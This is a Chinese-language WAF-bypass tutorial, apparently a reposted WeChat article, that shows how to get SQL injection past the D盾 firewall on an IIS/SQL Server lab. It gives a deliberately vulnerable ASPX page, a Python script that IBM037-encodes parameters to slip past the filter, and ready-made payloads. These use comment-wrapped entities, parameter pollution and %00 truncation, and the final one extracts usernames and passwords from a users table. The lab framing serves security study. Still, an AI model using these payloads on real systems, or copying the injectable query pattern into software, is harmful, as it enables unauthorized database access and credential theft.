實戰 | BypassD盾之SQL注入繞過總結
原文來源 :HACK學習呀
SQLServer特性
空格可以由其它字符替代
select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin
- 位置①
- 可以利用其它控制字符替換空格:%01~%0F、%11~%1F
- 可以利用注釋符號:/**/、—+a%0d%0a
- 可利用數學運算符以及數據類型:news_id=1.0,news_id=1e0,news_id=1-1
- 位置②
- 可以利用其它控制字符替換空格:%01~%0F、%11~%1F
- 可以利用注釋符號:/**/、—+a%0d%0a
- 可以利用加號+替換空格:union+select
- 位置③
- 可以利用其它控制字符替換空格:%01~%0F、%11~%1F
- 可以利用注釋符號:/**/、—+a%0d%0a
- 可利用數學運算符:+、-、~、. (注:其中-、~、.號必須是select查詢的第一個字段的數據類型為數字型才能使用)
- 可以利用小括號()替換空格:select(1),2,db_name()
- 位置④
- 可以利用其它控制字符替換空格:%01~%0F、%11~%1F
- 可以利用注釋符號:/**/、—+a%0d%0a
- 可利用其他字符:%80~%FF(需要IIS服務器支持)
- 位置⑤
- 可以利用其它控制字符替換空格:%01~%0F、%11~%1F
- 可以利用注釋符號:/**/、—+a%0d%0a
- 可利用其他字符:%80~%FF(需要IIS服務器支持)
- 可以利用點號.替換空格:from.users
- 可以利用中括號[]替換空格:from[users]
實驗環境
數據庫:SQL Server 2008R2
Web服務器:IIS7.5 CN
WAF:D盾_v2.1.6.1[測試版]
靶場源碼如下:index.aspx
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Data" %>
<%@ Import namespace="System.Data.SqlClient" %>
"server">
private DataSet resSet=new DataSet();
protected void Page_Load(object sender, EventArgs e)
{
String strconn = "server=.;database=test;uid=sa;pwd=admin";
string id = Request.Params["id"];
string sql = string.Format("select * from newss where id={0}", id);
SqlConnection connection=new SqlConnection(strconn);
connection.Open();
SqlDataAdapter dataAdapter = new SqlDataAdapter(sql, connection);
dataAdapter.Fill(resSet);
DgData.DataSource = resSet.Tables[0];
DgData.DataBind();
Response.Write("執行語句:
"+sql);
Response.Write("
結果為:");
}
"http://www.w3.org/1999/xhtml">
"server">
"Content-Type" content="text/html; charset=utf-8"/>
SQLServer注入測試
"form1" runat="server">
"DgData" runat="server" BackColor="White" BorderColor="#3366CC"
BorderStyle="None" BorderWidth="1px" CellPadding="4"
HeaderStyle-CssClass="head" Width="203px">
"#99CCCC" ForeColor="#003399" />
"#009999" Font-Bold="True" ForeColor="#CCFF99" />
"#99CCCC" ForeColor="#003399" HorizontalAlign="Left"
Mode="NumericPages" />
"White" ForeColor="#003399" />
"head" BackColor="#003399" Font-Bold="True" ForeColor="#CCCCFF">
另類字符集編碼繞過
繞過原理
HTTP協議兼容性:HTTP Charset的多樣性
Content-Type頭中使用charset定義字符集的應用場景不只有在responses中,request中同樣可以使用。
常見的服務器與可見編碼如下所示:
服務器信息可用編碼說明Nginx, uWSGI-Django-Python3IBM037, IBM500, cp875, IBM1026, IBM273對參數名和參數值進行編碼,服務器會對參數名和參數值均進行url解碼,需要對等號和& and進行編碼(不進行url編碼)Nginx, uWSGI-Django-Python2IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424對參數名和參數值進行便慢慢 服務器會對參數名和參數值均進行url解碼 等號和&符號不應該以任何方式編碼。Apache-TOMCAT8-JVM1.8-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025參數名按原始格式(可以像往常一樣使用url編碼)Body不論是否經過url編碼均可等號和&符號不應該以任何方式編碼Apache-TOMCAT7-JVM1.6-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025參數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可 等號和&符號不應該以任何方式編碼IIS6, 7.5, 8, 10 -ASPX (v4.x)IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025參數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可 等號和&符號不應該以任何方式編碼
實驗步驟
我們使用如下腳本來進行編碼轉換:
import urllib
import sys
params = sys.argv[1]
charset= sys.argv[2]
def paramEncode(params="id=1", charset="IBM037", encodeEqualSign=False, encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
result = ""
equalSign = "="
ampersand = "&"
if encodeEqualSign:
equalSign = equalSign.encode(charset)
if encodeAmpersand:
ampersand = ampersand.encode(charset)
params_list = params.split("&")
for param_pair in params_list:
param, value = param_pair.split("=")
if urldecodeInput:
param = urllib.unquote(param).decode('utf8')
value = urllib.unquote(value).decode('utf8')
param = param.encode(charset)
value = value.encode(charset)
if urlencodeOutput:
param = urllib.quote_plus(param)
value = urllib.quote_plus(value)
if result:
result += ampersand
result += param + equalSign + value
return result
print(paramEncode(params,charset))
這里我們使用IBM037編碼進行測試。
中文版的BurpSuite需要改變一下BurpSuite的字體類型
image-20211025173724964
然后使用BurpSuite抓包,并發送到Repeater
image-20211025173902801
修改請求方法為POST
image-20211025174140120
在Content-Type頭中添加charset字段,值為ibm037
Content-Type: application/x-www-form-urlencoded;charset=ibm037
image-20211025174228156
使用腳本進行編碼
python2 encode.py "id=1" IBM037 # 返回 %89%84=%F1
將請求內容改為%89%84=%F1,并發送
image-20211025174653394
可以看到正常返回查詢數據
接下來就是進行SQL注入了
image-20211025174846914
成功繞過D盾WAF
D盾清洗數據缺陷+多個規則特性組合繞過
繞過原理
規則缺陷/特性:利用D盾清洗數據的特性
WAF內置多種解碼器,經過多次解碼以后可能導致繞過。
當攻擊者提交的參數值中存在大量干擾數據時,如大量空格、TAB、換行、%0c、注釋等,WAF需要對其進行清洗(為提升性能和降低規則復雜性),篩選出真實的攻擊數據進行檢測,但是,如果清洗方式不正確,會導致真正的攻擊部分被清洗,然后拿去檢測的是不含有攻擊向量的數據,從而被Bypass。
規則缺陷/特性:數據庫空格可使用其它字符替代
替代字符可查看SQLServer特性。
規則缺陷/特性:%00時會被認為讀取已結束
在url中%00表示ascll碼中的0 ,而ascii中0作為特殊字符保留。
規則缺陷/特性:HTTP參數污染
同時提交參數id,會接收所有參數,通過逗號分隔。
實驗步驟
抓包,并更改請求方法
image-20211028161329759
測試D盾清洗數據的特性:
D盾為了防御XSS攻擊會對提交的特殊字符進行HTML實體編碼,例如提交的數據為</code></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-ratio="0.50390625" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpx03St3Gib4tD2bnZ3LCJQibib7K1TU4zEQF18gnuO7u9StL7LatjP3zicMA/640?wx_fmt=png" data-type="png" data-w="1280" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"></p><figure style="margin: 1.5em 8px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><figcaption style="outline: 0px;max-width: 100%;text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;box-sizing: border-box !important;word-wrap: break-word !important;">image-20211028162308251</figcaption></figure><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;">那么假如我們將提交一個已經實體化編碼的數據呢?</p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-ratio="0.8253358925143954" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxVCVfiahWlxoCHeYWzCKg3IeCiavmwQ6nL8GY3WdyyJghTKIhWxXGyZPw/640?wx_fmt=png" data-type="png" data-w="1042" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"></p><figure style="margin: 1.5em 8px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><figcaption style="outline: 0px;max-width: 100%;text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;box-sizing: border-box !important;word-wrap: break-word !important;">image-20211028163222933</figcaption></figure><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;">這里并沒有將<code style="padding: 3px 5px;outline: 0px;max-width: 100%;white-space: pre-wrap;line-height: 1.75;font-size: 12.6px;color: rgb(221, 17, 68);background-color: rgba(27, 31, 35, 0.05);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;box-sizing: border-box !important;word-wrap: break-word !important;">></code>進行解碼,而是將<code style="padding: 3px 5px;outline: 0px;max-width: 100%;white-space: pre-wrap;line-height: 1.75;font-size: 12.6px;color: rgb(221, 17, 68);background-color: rgba(27, 31, 35, 0.05);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;box-sizing: border-box !important;word-wrap: break-word !important;">&</code>符進行編碼</p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-ratio="0.49517684887459806" data-s="300,640" data-type="png" data-w="1244" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxmUZnXBUW4dZxZnGqvydOhLKWFWwOfT1cYmUrHEyPvWhib1HqTvdvicqw/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"></p><figure style="margin: 1.5em 8px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><figcaption style="outline: 0px;max-width: 100%;text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;box-sizing: border-box !important;word-wrap: break-word !important;">image-20211028164318800</figcaption></figure><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;">我們可以利用這個特性,使用這串字符去繞過某些多個關鍵字匹配的規則,如:union…select、order…by、/*…*/、'…' 等</p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-ratio="0.3109375" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxvrS2esx28GOBTnh9ibRAIpOicVMK2LibOic3yiaib2kicx6afXnthcyTpuNNw/640?wx_fmt=png" data-type="png" data-w="1280" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"></p><figure style="margin: 1.5em 8px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><figcaption style="outline: 0px;max-width: 100%;text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;box-sizing: border-box !important;word-wrap: break-word !important;">image-20211028171853112</figcaption></figure><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;line-height: 1.75;color: rgb(15, 76, 129);box-sizing: border-box !important;word-wrap: break-word !important;">繞過 and 1=1</strong></p><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;">注:1.e可以代替空格</p><pre style="margin: 10px 8px;padding: 1em;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;overflow-x: auto;background-color: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-top-left-radius: 8px;border-top-right-radius: 8px;border-bottom-right-radius: 8px;border-bottom-left-radius: 8px;box-sizing: border-box !important;word-wrap: break-word !important;"><code style="outline: 0px;max-width: 100%;line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;box-sizing: border-box !important;word-wrap: break-word !important;">id=1.eand/*%26%67%74%3b*/1=1</code></pre><figure style="margin: 1.5em 8px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><p style="outline: 0px;max-width: 100%;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-ratio="0.3141945773524721" data-s="300,640" data-type="png" data-w="1254" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxJIpFLfObvKfhz20ibRJlu6yf6KgPcN7wv3wb2ZHj4LeJFojVm6EDVbQ/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"></p><figcaption style="outline: 0px;max-width: 100%;text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;box-sizing: border-box !important;word-wrap: break-word !important;">image-20211028173512915<br style="outline: 0px;max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"></figcaption></figure><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;line-height: 1.75;color: rgb(15, 76, 129);box-sizing: border-box !important;word-wrap: break-word !important;">繞過 order by</strong></p><pre style="margin: 10px 8px;padding: 1em;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;overflow-x: auto;background-color: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-top-left-radius: 8px;border-top-right-radius: 8px;border-bottom-right-radius: 8px;border-bottom-left-radius: 8px;box-sizing: border-box !important;word-wrap: break-word !important;"><code style="outline: 0px;max-width: 100%;line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;box-sizing: border-box !important;word-wrap: break-word !important;">id=1 order/*%26%67%74%3b*/by 2</code></pre><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-ratio="0.28329297820823246" data-s="300,640" data-type="png" data-w="1239" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxDzhIkzwnLqgFSGvd7wJgiaImG3NGs7unfs2LTsRe4dS3b6GOS6UVMGw/640?wx_fmt=png" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"></p><figure style="margin: 1.5em 8px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><figcaption style="outline: 0px;max-width: 100%;text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;box-sizing: border-box !important;word-wrap: break-word !important;">image-20211028174034111</figcaption></figure><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;line-height: 1.75;color: rgb(15, 76, 129);box-sizing: border-box !important;word-wrap: break-word !important;">繞過 union select</strong></p><pre style="margin: 10px 8px;padding: 1em;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;overflow-x: auto;background-color: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-top-left-radius: 8px;border-top-right-radius: 8px;border-bottom-right-radius: 8px;border-bottom-left-radius: 8px;box-sizing: border-box !important;word-wrap: break-word !important;"><code style="outline: 0px;max-width: 100%;line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;box-sizing: border-box !important;word-wrap: break-word !important;">id=-1.eunion--%26%67%74%3b%0aselect NULL,NULL,NULL</code></pre><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-ratio="0.2703125" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxy5J0TGL8iabLzamKaB6iabb4d98oGpneJYxmtM0nXddCyqXugOvebfSw/640?wx_fmt=png" data-type="png" data-w="1280" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"></p><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;line-height: 1.75;color: rgb(15, 76, 129);box-sizing: border-box !important;word-wrap: break-word !important;">繞過 from</strong></p><p style="margin: 1.5em 8px;outline: 0px;max-width: 100%;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.1em;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;">from的繞過這就是一個技術活了,這里是利用到了HPP以及%00截斷來進行繞過</p><pre style="margin: 10px 8px;padding: 1em;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;overflow-x: auto;background-color: rgb(248, 248, 248);font-size: 14px;text-align: left;line-height: 1.5;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;border-top-left-radius: 8px;border-top-right-radius: 8px;border-bottom-right-radius: 8px;border-bottom-left-radius: 8px;box-sizing: border-box !important;word-wrap: break-word !important;"><code style="outline: 0px;max-width: 100%;line-height: 1.75;font-family: Menlo, "Operator Mono", Consolas, Monaco, monospace;white-space: nowrap;box-sizing: border-box !important;word-wrap: break-word !important;">id=-1.eunion--%26%67%74%3b%0aselect NULL,username,password/*%26%67%74%3b&id=%00%0d*/from users </code></pre><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;font-size: 16px;letter-spacing: 0.5440000295639038px;white-space: normal;text-align: center;box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-ratio="0.25" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/Uq8Qfeuvouicjn0iaON3PZxsUnua11RUpxewvwIpAlaEVJSyyRU9pdEGHcmphHKNOhbtBUic8eIfQoIzx9eEE271A/640?wx_fmt=png" data-type="png" data-w="1280" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;width: 677px !important;visibility: visible !important;"></p><figure style="margin: 1.5em 8px;outline: 0px;max-width: 100%;letter-spacing: 0.5440000295639038px;white-space: normal;font-size: 14px;text-align: left;line-height: 1.75;font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;color: rgb(63, 63, 63);box-sizing: border-box !important;word-wrap: break-word !important;"><figcaption style="outline: 0px;max-width: 100%;text-align: center;line-height: 1.75;color: rgb(136, 136, 136);font-size: 0.8em;box-sizing: border-box !important;word-wrap: break-word !important;">image-20211028174713969</figcaption></figure><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: right;box-sizing: border-box !important;word-wrap: break-word !important;"><strong style="outline: 0px;max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;">侵權請私聊公眾號刪文</strong></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_jpg/3xxicXNlTXLic5ia2MNtwAvOtCjOnlHEWTBtrs8XuHfZpeIoBhZcC7Lp9V9LgANlV97AgLTSsdZXqkEjz2WXticVfQ/640?wx_fmt=jpeg" data-cropx1="0" data-cropx2="620" data-cropy1="0" data-cropy2="23.333333333333336" data-fileid="503042608" data-ratio="0.037096774193548385" src="https://mmbiz.qpic.cn/mmbiz_jpg/3xxicXNlTXLicjiasf4mjVyxw4RbQt9odm9nxs9434icI9TG8AXHjS3Btc6nTWgSPGkvvXMb7jzFUTbWP7TKu6EJ6g/640?wx_fmt=jpeg" data-type="jpeg" data-w="620" sizes="(max-width: 620px) 100vw, 620px" style="outline: 0px;box-sizing: border-box !important;word-wrap: break-word !important;visibility: visible !important;width: 558px !important;" title="微信公眾號文章素材之分割線大全" width="558"></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);box-sizing: border-box !important;word-wrap: break-word !important;"><img class="rich_pages wxw-img" data-fileid="503042609" data-ratio="0.4" data-s="300,640" src="https://mmbiz.qpic.cn/mmbiz_png/3xxicXNlTXLib0FWIDRa9Kwh52ibXkf9AAkntMYBpLvaibEiaVibzNO1jiaVV7eSibPuMU3mZfCK8fWz6LicAAzHOM8bZUw/640?wx_fmt=jpeg" data-type="jpeg" data-w="1280" style="outline: 0px;letter-spacing: 0.544px;box-sizing: border-box !important;word-wrap: break-word !important;visibility: visible !important;width: 677px !important;"><br style="outline: 0px;max-width: 100%;box-sizing: border-box !important;word-wrap: break-word !important;"></p><p style="outline: 0px;max-width: 100%;font-family: -apple-system, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;letter-spacing: 0.544px;white-space: normal;background-color: rgb(255, 255, 255);text-align: right;box-sizing: border-box !important;word-wrap: break-word !important;overflow-wrap: break-word !important;"><img class="__bg_gif rich_pages wxw-img" data-fileid="503042610" data-ratio="0.15" src="https://mmbiz.qpic.cn/mmbiz_gif/NZycfjXibQzlug4f7dWSUNbmSAia9VeEY0umcbm5fPmqdHj2d12xlsic4wefHeHYJsxjlaMSJKHAJxHnr1S24t5DQ/640?wx_fmt=gif" data-type="gif" data-w="480" data-width="100%" style="outline: 0px;vertical-align: top;font-size: 13px;letter-spacing: 0.544px;font-family: -apple-system-font, system-ui, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif;box-sizing: border-box !important;word-wrap: break-word !important;visibility: visible !important;width: 276px !important;"></p>
